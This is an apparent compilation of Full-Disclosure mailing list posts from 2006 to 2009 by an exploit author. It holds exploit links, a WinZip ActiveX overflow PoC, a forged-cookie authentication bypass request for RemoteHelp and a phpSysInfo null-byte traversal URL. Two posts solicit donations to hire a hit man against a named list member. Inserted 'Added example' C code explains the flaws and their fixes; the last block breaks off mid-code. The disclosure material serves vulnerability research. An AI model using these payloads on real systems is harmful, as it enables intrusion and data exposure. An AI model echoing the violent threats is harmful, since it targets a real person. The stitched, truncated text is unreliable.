Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
Did you and them get your degree from the same university of trolls? I have mistaken nothing for nothing. Fuck you.

--- On Thu, 5/11/09, frank^2 wrote:

> From: frank^2
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner"
> Cc: full-disclosure@lists.grok.org.uk
> Date: Thursday, 5 November, 2009, 12:50 AM
>
> On Wed, Nov 4, 2009 at 4:13 PM, Micheal Turner wrote:
> > It's evil. Making people believe that someone is dead, publicly, and placing obituaries online shows no regard for the thoughts & feelings of the person being trolled or the others who may read them.
> >
> > In a community where whispers and hearsay can even get SANS to look for an OpenSSH 0day "doing-the-rounds", spreading 'misinformation' about a well-liked individual who worked on a project for the community is unpleasant - making out they are dead is just horrible.
> >
> > There are people at the end of the computers. Don't ever forget it.
>
> This is kind of a silly tangent to be having an argument about on this list, so I'll try to make this my last comment on the matter.
>
> It may be a little semantic, but I feel you're confusing wickedness with a lack of empathy. Evil implies that the intent behind the prank was to cause emotional harm. It's certainly detestable that the prank was based in making people assume that str0ke was dead, but I'm doubtful that the purpose of its spread was to cause harm. I hate to be That Guy That Explains The Joke, but I'm pretty sure the purpose was to mock the fact that a) str0ke has been quiet for a long while publicly and b) milw0rm hasn't been updated for a lengthy period of time for yet-to-be explained reasons. (I think v3n0m piped in a while back and said they were taking care of the backlog, but that's about all I remember.)
>
> While the line between apathy towards others' emotions and intent to truly cause harm to one's emotions can be blurred, I don't think it's particularly fair to call the perpetrators of this prank evil. "Evil" is taking joy in the suffering of others. The intent of trolling is to get a specific reaction from a crafted falsehood or comment -- it doesn't necessarily follow that the expected reaction here was emotional harm. So given the circumstances, I feel it's more accurate to say they just simply didn't care.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
It's evil. Making people believe that someone is dead, publicly, and placing obituaries online shows no regard for the thoughts & feelings of the person being trolled or the others who may read them.

In a community where whispers and hearsay can even get SANS to look for an OpenSSH 0day "doing-the-rounds", spreading 'misinformation' about a well-liked individual who worked on a project for the community is unpleasant - making out they are dead is just horrible.

There are people at the end of the computers. Don't ever forget it.

--- On Wed, 4/11/09, frank^2 wrote:

> From: frank^2
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner"
> Cc: full-disclosure@lists.grok.org.uk
> Date: Wednesday, 4 November, 2009, 11:08 PM
>
> On Wed, Nov 4, 2009 at 1:58 PM, Micheal Turner wrote:
> > It seems the whole thing was a hoax rumor put about by people who I can only describe as pure evil. Glad to know he is fine.
>
> What's "pure evil" about exploiting the ease by which one can spread misinformation? If anything, it exposes how willing even a community like this is to believe a single blogpost and spread it around without truly confirming its origins.
>
> I was trolled, I have lost. Feel free to admit it yourself instead of calling this prank "pure evil."
Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
It seems the whole thing was a hoax rumor put about by people who I can only describe as pure evil. Glad to know he is fine.

--- On Wed, 4/11/09, webDEViL wrote:

> From: webDEViL
> Subject: Re: [Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
> To: "Micheal Turner"
> Cc: full-disclosure@lists.grok.org.uk
> Date: Wednesday, 4 November, 2009, 1:39 PM
>
> Very sad news indeed.
>
> On Wed, Nov 4, 2009 at 6:49 PM, Micheal Turner wrote:
> > We are mourning a good friend today. I first began talking to str0ke when I started publishing exploit code onto this mailing list; he would always be polite and friendly in his emails. I got to know him over the years and am saddened by his departure; he contributed to the exploit scene and hacking subculture in a huge way. The last time I talked with him I asked him if I could interview him for my blog, he laughed and said he should be interviewing the exploit writers since he didn't do anything. That was str0ke, and str0ke did a lot: he always fought for the rights of the exploit developers and his website was the bread and butter of many a hacker's day. He will sadly be missed by many people, hackers & friends.
> >
> > At least now we can post exploits without that damn // milw0rm.com comment being added to the end!!! ;-) I joke, this code is dedicated to you str0ke. R.I.P my friend.
> >
> > http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c
[Full-disclosure] Apple ptrace panic PoC - R.I.P str0ke
We are mourning a good friend today. I first began talking to str0ke when I started publishing exploit code onto this mailing list; he would always be polite and friendly in his emails. I got to know him over the years and am saddened by his departure; he contributed to the exploit scene and hacking subculture in a huge way. The last time I talked with him I asked him if I could interview him for my blog, he laughed and said he should be interviewing the exploit writers since he didn't do anything. That was str0ke, and str0ke did a lot: he always fought for the rights of the exploit developers and his website was the bread and butter of many a hacker's day. He will sadly be missed by many people, hackers & friends.

At least now we can post exploits without that damn // milw0rm.com comment being added to the end!!! ;-) I joke, this code is dedicated to you str0ke. R.I.P my friend.

http://www.hackerfantastic.com/archive/exploits/prdelka-vs-APPLE-ptracepanic.c
[Full-disclosure] Another one hit send today.
Another one hit send today, it's all over my inbox. "Idiots on Internet ranting nonsense", "Opinions like assholes, everyone has one"... Damn FD'ers. They're all alike.

[...]

I realized something today: in the last few months I have read FD twice, and each time I have left without enlightenment. The daily trollings of n3td3v and flame responses, which we have all been guilty of, have caused the list to degenerate completely in usefulness. The most interesting posts are often mirrored on other lists such as BugTraq, and technical discussion is lately best held on the likes of DailyDave.

I call upon Full-Disclosure to fix up, man up and resolve this problem for good. Ignore n3td3v. Do not reply to his postings. Ignore his replies to your postings. Do not give comment or weight to any argument or viewpoint that he may hold. This single act of solidarity by all users of FD could (in time) help repair the damage already caused by this single or group of individual(s).

n3td3v can be credited for achieving one thing in the field of computer security: completely destroying one of the main outlets used by individuals who believe in full disclosure of issues pertaining to computer security. Perhaps this was a deliberate attack or just a mental patient with a day pass out to a cybercafe.

The time for action is now. Let us have our Ides of March this year.

-- prdelka
Re: [Full-disclosure] SECNAP IS CRAP
--- reepex <[EMAIL PROTECTED]> wrote:

> why are companies like this allowed to exist? Their employee (Bob McGuire, Director) openly admits (see previous emails with Robert, DonB, and I) that his company participates in FUD and scare tactics. They have no apparent talent and use 'vulnerability scanners' and 'security tools' and divert our conversation from their POS business to how to help protect against spam.
>
> Secnap should be blacklisted and its employees should be ridiculed on sight.

why are you hating on them? thought you'd be glad to have some new friends, after all - sounds like you have quite a bit in common!
[Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012a
n3td3v agenda & Cyber Security group Solid Information Security State Release #0012a

MARKING: RESTRICTIONS APPLY. FAO: WORLD LEADERS

== Introduction ==

Serious high-risk ultra critical vulnerability has been identified in Remote Help application that may be used by CIA, NSA and FBI employees when helping colleagues on anti-terror campaigns. RemoteHelp is a minimal http server that allows to view and control a remote pc running a 32-bit version of Microsoft Windows. Current version is 0.0.6 and runs stand-alone or installs as a service.

== URL ==

http://sourceforge.net/projects/remotehelp/

== HISTORY ==

After n3td3v agenda emailed the NSA, SANS and all information security groups and was found not to be taken seriously. High risk proof of concept exploit code has been authored for severe vulnerability in Remote Help application which may be used by any number of Yahoo!, Google!, Ebay! or NSA employees. This vulnerability gives rise to serious national infrastructure risk and should not be underestimated!

== Proof of Concept ==

I found a vulnerability in the pages.c file which generates the login page dialog and authenticates a user. After it checks if your "user" and "pass" parameter match the defaults (user/default) it does this:

    strncpy(cookie,"user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT",1024);

for a valid login, and for an invalid login it sets an expired cookie like so:

    strncpy(cookie,"user=default; path=/; expires=Sun, 11-May-1970 22:11:40 GMT",1024);

All you have to do is add

    Cookie: user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT

to your HTTP request and you can bypass authentication to the Remote Help server and access the filesystem/exec commands/view the webcam of the hosts running it.

== Credit ==

n3td3v & documentation help by Michael Turner.

"Never trust your employees."
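Added example, not part of the post above and not RemoteHelp's pages.c: the check the post describes, reduced to a raw-request cookie parser that accepts any client sending "user=default", next to the replacement a practitioner would want, a per-login random session token held server-side and compared without early exit. The request strings, the 192.0.2.10 host and the token value are constructed for the example; the token would normally come from a CSPRNG at login time.

```c
/* Added example (not RemoteHelp's code): why a constant cookie value is not
 * authentication, and what a server-side session token check looks like.
 * Request strings, host and token below are constructed. */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

/* Copy the value of the first "Cookie:" header line of a raw HTTP request. */
static int get_cookie_header(const char *request, char *out, size_t outlen)
{
    const char *p = request;
    while (p && *p) {
        if (strncasecmp(p, "Cookie:", 7) == 0) {
            p += 7;
            while (*p == ' ' || *p == '\t') p++;
            size_t n = strcspn(p, "\r\n");
            if (n >= outlen) return 0;
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
        p = strchr(p, '\n');
        if (p) p++;
    }
    return 0;
}

/* The check the post describes: a Cookie header containing "user=default"
 * is taken as proof of login. Any client can send that header unprompted. */
int weak_is_authenticated(const char *request)
{
    char cookie[1024];
    if (!get_cookie_header(request, cookie, sizeof cookie)) return 0;
    return strstr(cookie, "user=default") != NULL;
}

/* Extract one cookie's value from an "a=b; c=d" cookie string. */
static int cookie_value(const char *cookie, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p = cookie;
    while (*p) {
        while (*p == ' ' || *p == ';') p++;
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            p += nlen + 1;
            size_t n = strcspn(p, ";");
            if (n >= outlen) return 0;
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
        p += strcspn(p, ";");
    }
    return 0;
}

/* Compare without stopping at the first differing byte. */
static int ct_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    unsigned char diff = (la != lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Hardened check: the cookie must carry the random token the server issued
 * at login and still holds (issued_token stands in for that server-side
 * record). A constant or guessable cookie value never matches. */
int fixed_is_authenticated(const char *request, const char *issued_token)
{
    char cookie[1024], tok[128];
    if (!get_cookie_header(request, cookie, sizeof cookie)) return 0;
    if (!cookie_value(cookie, "session", tok, sizeof tok)) return 0;
    return ct_equal(tok, issued_token);
}

/* Constructed: the request the post says an attacker sends. */
const char *const FORGED_REQUEST =
    "GET / HTTP/1.0\r\n"
    "Host: 192.0.2.10\r\n"
    "Cookie: user=default; path=/; expires=Sun, 11-May-2030 22:11:40 GMT\r\n"
    "\r\n";

/* Constructed: token issued at login, and a request from that client. */
const char *const ISSUED_TOKEN = "7c1f0b9a4d2e8f3b6a5c9d0e1f2a3b4c";
const char *const LEGIT_REQUEST =
    "GET / HTTP/1.0\r\n"
    "Host: 192.0.2.10\r\n"
    "Cookie: session=7c1f0b9a4d2e8f3b6a5c9d0e1f2a3b4c; path=/\r\n"
    "\r\n";

int main(void)
{
    printf("forged, weak check: %d\n", weak_is_authenticated(FORGED_REQUEST));
    printf("forged, fixed check: %d\n", fixed_is_authenticated(FORGED_REQUEST, ISSUED_TOKEN));
    printf("legit, fixed check: %d\n", fixed_is_authenticated(LEGIT_REQUEST, ISSUED_TOKEN));
    return 0;
}
```

The weak check passes the forged request because the only thing it inspects is a string the server itself printed in its login response; the fixed check fails it because no token was ever issued for that client. Expiry dates in the Set-Cookie line are advice to the browser and carry no weight with anyone crafting the header by hand.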
Re: [Full-disclosure] sans handler gives out n3td3v e-mail to public
Once upon a time in toy town, I offered to contract the services of a professional hit-man to have n3td3v executed - in part a joke, my black humour. However, I have received so many donations from various gmail.com addresses that I have just been able to purchase my first car with the left-over change. As I type this from my Lamborghini Diablo parked up in a car park at London's Heathrow eagerly awaiting the arrival of "Aghbad", a delightful eastern european chap with a pretty impressive handlebar mustache which matches the colour of the AK-47 I believe has been paid to come off before the concourse, I can't help but realize just HOW MANY of the SANS people paid their donations to this worthwhile cause. I also wonder if n3td3v thought the CIA would allow him to continue his campaign of hate. Maybe the FUD will stop and we can all get on with whatever we were doing before the n3td3v agenda.

--- n3td3v <[EMAIL PROTECTED]> wrote:

> On Mon, Mar 31, 2008 at 4:00 AM, <[EMAIL PROTECTED]> wrote:
> > On Sat, 29 Mar 2008 17:08:43 -, n3td3v said:
> > > Why are they announcing podcasts when both Joel Esler and Johannes Ullrich have a privacy breach still to publicly acknowledge and apologize for?
> >
> > Umm.. maybe because, despite what you may think, your little pissing contest with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything* and shut down the entire workflow and not do a single damned thing until this issue is resolved".
>
> They aren't busy or getting on with business, they have obviously snubbed the n3td3v agenda.
>
> Joel Esler is back on duty, http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been sacked and he is talking about April Fools Day.
>
> I'm mighty angry,
>
> n3td3v
[Full-disclosure] old junk
old junk from 2007. roll on 2008! cb payload busted in rshd exploit. enjoy.

http://rapidshare.com/files/85400481/prdelka-vs-GNU-citadel.tar.gz.html
http://rapidshare.com/files/85400619/prdelka-vs-MS-rshd.tar.gz.html
[Full-disclosure] mbsebbs 0.70.0 & below local root exploit
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-mbsebbs.c

sux, fixes available.
Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
here we go, enjoy!

https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c

--- Micheal Turner <[EMAIL PROTECTED]> wrote:

> 7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below;
>
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
>     WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
> end sub
> -->
>
> CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"
>
> -- prdelka
Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
7245 correctly resolves this issue; standard stack overflow in WZFILEVIEW.FilePattern snatching EIP; PoC below;

<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
    WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
end sub
-->

CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"

-- prdelka
[Full-disclosure] prdelka.blackart.org.uk
some exploits (resolved by vendors, apply your fixes).

https://prdelka.blackart.org.uk/exploitz/prdelka-vs-AEP-smartgate.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-CISCO-vpnftp.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-libc.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-swask.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-swmodify.c
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-HPUX-swpackage.c
https://prdelka.blackart.org.uk/sh3lLc0de/linux_tolower_remote.S

check out the other directories for misc toolz, junk & bl0g :)
[Full-disclosure] n3td3v malware removal tool
I have spent a large amount of time trying to configure my filters to prune my email of the daily crap (largely due to n3td3v's inane rants). However, this morning I was stunned to see him waffling on (again) about the big evil corporations and their monopoly on security. News flash n3td3v, we do not care that Yahoo! employees are stealing company milk from the coffee room. I've tried to put up with him, I've tried to ignore him, have patiently waited for him to post at least some XSS vulnerability.

The time has come to remove n3td3v. I have contacted the services of a hit man through forums directly related to former shadow-crew and notorious online criminal gangs (www.darkmarket.ws www.talkcash.net www.cardersmarket.com). I have been given a quotation for both overseas and local work from a number of different individuals. I am currently trying to raise the $15,000 required for the success of this operation. At the bottom of http://prdelka.blackart.org.uk you will find a Paypal donate button; should anyone at F-Secure, Symantec, Yahoo!, Google or indeed any of the wider security community wish to donate to help push for the silence then your donations will be thankfully accepted.

A GPG key has been attached to this email, please use it if you wish to engage me in discussion any further in this matter.

Do the right thing. Let God sort him out.

Attachment: prdelka.asc
Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
Exploit has been attached as problems with site hosting over weekend.

--- Micheal Turner <[EMAIL PROTECTED]> wrote:

> http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
>
> --- labs-no-reply <[EMAIL PROTECTED]> wrote:
>
> > Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
> >
> > iDefense Security Advisory 07.20.06
> > http://www.idefense.com/application/poi/display?type=vulnerabilities
> > July 20, 2006
> >
> > I. BACKGROUND
> >
> > Solaris is a UNIX operating system developed by Sun Microsystems.
> >
> > II. DESCRIPTION
> >
> > Local exploitation of an integer overflow vulnerability in Sun Microsystems Inc. Solaris allows attackers to read kernel memory from a non-privileged userspace process.
> >
> > The vulnerability specifically exists due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c. The vulnerable code is as follows:
> >
> >     if (kstr != NULL) {
> >         if ((strcnt = strlen(kstr)) >= count) {
> >             getcnt = count - 1;
> >             if (subyte(buf + count - 1, 0) < 0)
> >                 return (set_errno(EFAULT));
> >         } else
> >             getcnt = strcnt + 1;
> >         if (copyout(kstr, buf, getcnt))
> >             return (set_errno(EFAULT));
> >         return (strcnt + 1);
> >     }
> >
> > If the variable count (which is a value provided by the user invoking the function) is 0, the function will call the copyout function with a length argument of -1. Because copyout interprets the length argument as an unsigned integer, a large amount of data will be copied out to userspace, well beyond the boundaries that are intended.
> >
> > III. ANALYSIS
> >
> > Successful exploitation of this vulnerability allows attackers to read sensitive kernel memory. This can lead to the compromise of passwords or keys. It can also aid an attacker in gathering information for exploitation of other kernel level vulnerabilities.
> >
> > IV. DETECTION
> >
> > iDefense has confirmed that Solaris 10 is vulnerable. Earlier versions of Solaris are not affected.
> >
> > V. WORKAROUND
> >
> > iDefense is currently unaware of any workaround for this issue.
> >
> > VI. VENDOR RESPONSE
> >
> > Sun Alert ID 102343 addresses this issue and is available at:
> >
> > http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
> >
> > VII. CVE INFORMATION
> >
> > A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.
> >
> > VIII. DISCLOSURE TIMELINE
> >
> > 12/15/2005 Initial vendor notification
> > 12/15/2005 Initial vendor response
> > 07/20/2006 Coordinated public disclosure
> >
> > IX. CREDIT
> >
> > The discoverer of this vulnerability wishes to remain anonymous.
> >
> > Get paid for vulnerability research
> > http://www.idefense.com/poi/teams/vcp.jsp
> >
> > Free tools, research and upcoming events
> > http://labs.idefense.com
> >
> > X. LEGAL NOTICES
> >
> > Copyright © 2006 iDefense, Inc.
> >
> > Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.
> >
> > Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c

--- labs-no-reply <[EMAIL PROTECTED]> wrote:

> Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
>
> iDefense Security Advisory 07.20.06
> http://www.idefense.com/application/poi/display?type=vulnerabilities
> July 20, 2006
>
> I. BACKGROUND
>
> Solaris is a UNIX operating system developed by Sun Microsystems.
>
> II. DESCRIPTION
>
> Local exploitation of an integer overflow vulnerability in Sun Microsystems Inc. Solaris allows attackers to read kernel memory from a non-privileged userspace process.
>
> The vulnerability specifically exists due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c. The vulnerable code is as follows:
>
>     if (kstr != NULL) {
>         if ((strcnt = strlen(kstr)) >= count) {
>             getcnt = count - 1;
>             if (subyte(buf + count - 1, 0) < 0)
>                 return (set_errno(EFAULT));
>         } else
>             getcnt = strcnt + 1;
>         if (copyout(kstr, buf, getcnt))
>             return (set_errno(EFAULT));
>         return (strcnt + 1);
>     }
>
> If the variable count (which is a value provided by the user invoking the function) is 0, the function will call the copyout function with a length argument of -1. Because copyout interprets the length argument as an unsigned integer, a large amount of data will be copied out to userspace, well beyond the boundaries that are intended.
>
> III. ANALYSIS
>
> Successful exploitation of this vulnerability allows attackers to read sensitive kernel memory. This can lead to the compromise of passwords or keys. It can also aid an attacker in gathering information for exploitation of other kernel level vulnerabilities.
>
> IV. DETECTION
>
> iDefense has confirmed that Solaris 10 is vulnerable. Earlier versions of Solaris are not affected.
>
> V. WORKAROUND
>
> iDefense is currently unaware of any workaround for this issue.
>
> VI. VENDOR RESPONSE
>
> Sun Alert ID 102343 addresses this issue and is available at:
>
> http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
>
> VII. CVE INFORMATION
>
> A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.
>
> VIII. DISCLOSURE TIMELINE
>
> 12/15/2005 Initial vendor notification
> 12/15/2005 Initial vendor response
> 07/20/2006 Coordinated public disclosure
>
> IX. CREDIT
>
> The discoverer of this vulnerability wishes to remain anonymous.
>
> Get paid for vulnerability research
> http://www.idefense.com/poi/teams/vcp.jsp
>
> Free tools, research and upcoming events
> http://labs.idefense.com
>
> X. LEGAL NOTICES
>
> Copyright © 2006 iDefense, Inc.
>
> Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.
>
> Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
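Added example, not Sun's code and not the patch behind Sun Alert 102343: the systeminfo.c logic quoted in the advisory above, replayed in userspace with a stand-in copyout() that records the length it is handed, so the count == 0 case can be watched turning getcnt = -1 into SIZE_MAX. The second routine adds the range check the quoted code lacks; rejecting count < 1 is this example's fix, not a claim about the vendor's. The kernel string "SunOS", the 16-byte user buffer and the counts are constructed, and the stand-in's bounds check exists only so the demo stays inside its own buffer; the real copyout() has no such check.

```c
/* Added example, not Sun's code: the quoted systeminfo.c arithmetic replayed
 * in userspace. fake_copyout() stands in for the kernel's copyout(), records
 * the length it is handed, and bounds-checks only so this demo stays in its
 * own buffer; the real copyout() has no such check. Values are constructed. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static size_t last_request;                     /* last length copyout saw */
size_t last_copyout_request(void) { return last_request; }

/* copyout(kaddr, uaddr, len) takes a size_t, so the getcnt of -1 computed by
 * the caller arrives here as SIZE_MAX. */
static int fake_copyout(const char *src, char *dst, size_t len, size_t dstcap)
{
    last_request = len;
    if (len > dstcap)   /* the real kernel keeps copying until an unmapped page faults */
        return -1;
    memcpy(dst, src, len);
    return 0;
}

/* Mirrors the quoted logic. count is caller-supplied; returns strcnt + 1 or
 * a negative errno. The count > bufcap guard is harness-only. */
long sysinfo_copy_vulnerable(const char *kstr, char *buf, size_t bufcap, long count)
{
    long strcnt, getcnt;
    if (kstr == NULL || count > (long)bufcap)
        return -EINVAL;
    if ((strcnt = (long)strlen(kstr)) >= count) {
        getcnt = count - 1;                     /* count == 0 gives -1 */
        /* subyte(buf + count - 1, 0): with count == 0 the kernel zeroes the
         * byte before the user buffer; skipped here to stay in bounds. */
        if (count > 0)
            buf[count - 1] = '\0';
    } else {
        getcnt = strcnt + 1;
    }
    if (fake_copyout(kstr, buf, (size_t)getcnt, bufcap))
        return -EFAULT;
    return strcnt + 1;
}

/* Same routine with a range check before any arithmetic. Rejecting
 * count < 1 is this example's fix, not necessarily the vendor's. */
long sysinfo_copy_fixed(const char *kstr, char *buf, size_t bufcap, long count)
{
    if (kstr == NULL || count < 1 || count > (long)bufcap)
        return -EINVAL;
    long strcnt = (long)strlen(kstr), getcnt;
    if (strcnt >= count) {
        getcnt = count - 1;
        buf[count - 1] = '\0';
    } else {
        getcnt = strcnt + 1;
    }
    if (fake_copyout(kstr, buf, (size_t)getcnt, bufcap))
        return -EFAULT;
    return strcnt + 1;
}

/* Constructed "user buffer" and kernel string, so each case is one call. */
static char user_buf[16];
const char *user_buffer(void) { return user_buf; }

long try_vulnerable(long count)
{
    memset(user_buf, 'X', sizeof user_buf);
    return sysinfo_copy_vulnerable("SunOS", user_buf, sizeof user_buf, count);
}

long try_fixed(long count)
{
    memset(user_buf, 'X', sizeof user_buf);
    return sysinfo_copy_fixed("SunOS", user_buf, sizeof user_buf, count);
}

int main(void)
{
    long r = try_vulnerable(16);
    printf("count=16: ret=%ld buf=\"%s\"\n", r, user_buffer());
    r = try_vulnerable(0);
    printf("count=0 : ret=%ld, copyout asked for %zu bytes\n", r, last_copyout_request());
    r = try_fixed(0);
    printf("fixed, count=0: ret=%ld\n", r);
    return 0;
}
```

The signed-to-unsigned conversion at the copyout() call is the whole bug: every other line of the quoted routine is correct for count >= 1, which is why a single early range check on the caller-supplied size closes it.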
Re: [Full-disclosure] phpSysInfo arbitrary file identification
Tested 2.5.1

--- Micheal Turner <[EMAIL PROTECTED]> wrote:

> phpSysInfo is a popular webscript for displaying stats about a webserver available from http://phpsysinfo.sourceforge.net/ with 365012 downloads to date. A vulnerability which allows an attacker to identify if a file exists on the remote system has been identified. By supplying a directory traversal string to lng= in a POST or GET request to index.php with a poison null byte terminating %00 allows an attacker to determine if any file exists. The vulnerable function is shown.
>
>     if (!file_exists(APP_ROOT . '/includes/lang/' . $lng . '.php')) {
>
> An attacker can determine if the file exists by studying the returned error message, valid files return the string Sorry, we don't support this language. and invalid files return the normal phpSysInfo application page.
>
> Example.
> www.somesite.com/phpSysInfo/index.php?template=blue&lng=../../../../../../../../../../../var/log/httpd-error.log%00
>
> Humour.
> http://www.google.co.uk/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&q=%22System+Information%22+phpSysInfo+site%3A.edu&btnG=Search&meta=
[Full-disclosure] phpSysInfo arbitrary file identification
phpSysInfo is a popular webscript for displaying stats about a webserver available from http://phpsysinfo.sourceforge.net/ with 365012 downloads to date. A vulnerability which allows an attacker to identify if a file exists on the remote system has been identified. By supplying a directory traversal string to lng= in a POST or GET request to index.php with a poison null byte terminating %00 allows an attacker to determine if any file exists. The vulnerable function is shown.

    if (!file_exists(APP_ROOT . '/includes/lang/' . $lng . '.php')) {

An attacker can determine if the file exists by studying the returned error message, valid files return the string Sorry, we don't support this language. and invalid files return the normal phpSysInfo application page.

Example.
www.somesite.com/phpSysInfo/index.php?template=blue&lng=../../../../../../../../../../../var/log/httpd-error.log%00

Humour.
http://www.google.co.uk/search?hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&q=%22System+Information%22+phpSysInfo+site%3A.edu&btnG=Search&meta=
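Added example, not phpSysInfo's code: the path construction from the line quoted above, built byte for byte with a %00 inside lng and then read back as a C string, which is what the PHP runtime of that era handed to stat(): the string ends at the NUL, so the ".php" suffix appended after it is never seen and file_exists() answers for whatever path the traversal names. The second probe shows the allowlist check that keeps NUL bytes, dots and slashes from reaching the filesystem at all. APP_ROOT is an assumed install path and FAKE_FS is a constructed two-entry stand-in for the filesystem, with a lexical "../" resolver, so the example runs offline and the same code path can be checked for a file that exists and one that does not. This example covers both phpSysInfo messages on this page.

```c
/* Added example, not phpSysInfo's code: the quoted path construction with a
 * %00 inside $lng as the C library (and so stat()) sees it, and an allowlist
 * check that keeps such input off the filesystem. APP_ROOT and FAKE_FS are
 * constructed so the example runs offline. */
#include <ctype.h>
#include <string.h>

#define APP_ROOT "/var/www/phpSysInfo"          /* assumed install path */

/* Constructed stand-in for the filesystem. */
static const char *const FAKE_FS[] = { APP_ROOT "/includes/lang/en.php", "/etc/passwd" };

/* Resolve "." and ".." lexically, as path lookup does, so ../ chains work. */
static void normalize(const char *in, char *out)
{
    char *w = out;
    *w++ = '/'; *w = '\0';
    for (const char *p = in; *p; p += strcspn(p, "/")) {
        while (*p == '/') p++;
        size_t n = strcspn(p, "/");
        if (n == 2 && p[0] == '.' && p[1] == '.') {          /* pop a component */
            for (w -= (w > out + 1); w > out + 1 && w[-1] != '/'; w--) ;
            *w = '\0';
        } else if (n && !(n == 1 && p[0] == '.')) {
            memcpy(w, p, n); w += n;
            *w++ = '/'; *w = '\0';
        }
    }
    if (w > out + 1) w[-1] = '\0';                          /* drop trailing slash */
}

static int fake_file_exists(const char *path)
{
    char norm[512];
    normalize(path, norm);
    for (size_t i = 0; i < sizeof FAKE_FS / sizeof FAKE_FS[0]; i++)
        if (strcmp(FAKE_FS[i], norm) == 0) return 1;
    return 0;
}

static int hexval(int c) { return isdigit(c) ? c - '0' : tolower(c) - 'a' + 10; }
/* Decode %XX sequences; the output may contain a NUL byte (%00). */
size_t url_decode(const char *in, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (; *in && n < cap; in++) {
        if (*in == '%' && isxdigit((unsigned char)in[1]) && isxdigit((unsigned char)in[2])) {
            out[n++] = (unsigned char)(hexval(in[1]) * 16 + hexval(in[2]));
            in += 2;
        } else
            out[n++] = (unsigned char)*in;
    }
    return n;
}

/* Build APP_ROOT . '/includes/lang/' . $lng . '.php' byte for byte and hand it
 * back as a C string: a NUL inside $lng ends the path, hiding the ".php". */
const char *effective_path(const unsigned char *lng, size_t lng_len, char *out, size_t cap)
{
    const char *prefix = APP_ROOT "/includes/lang/"; size_t pl = strlen(prefix);
    if (pl + lng_len + sizeof ".php" > cap) return NULL;
    memcpy(out, prefix, pl);
    memcpy(out + pl, lng, lng_len);
    memcpy(out + pl + lng_len, ".php", sizeof ".php");
    return out;
}

/* What the C library receives for a raw lng= value. */
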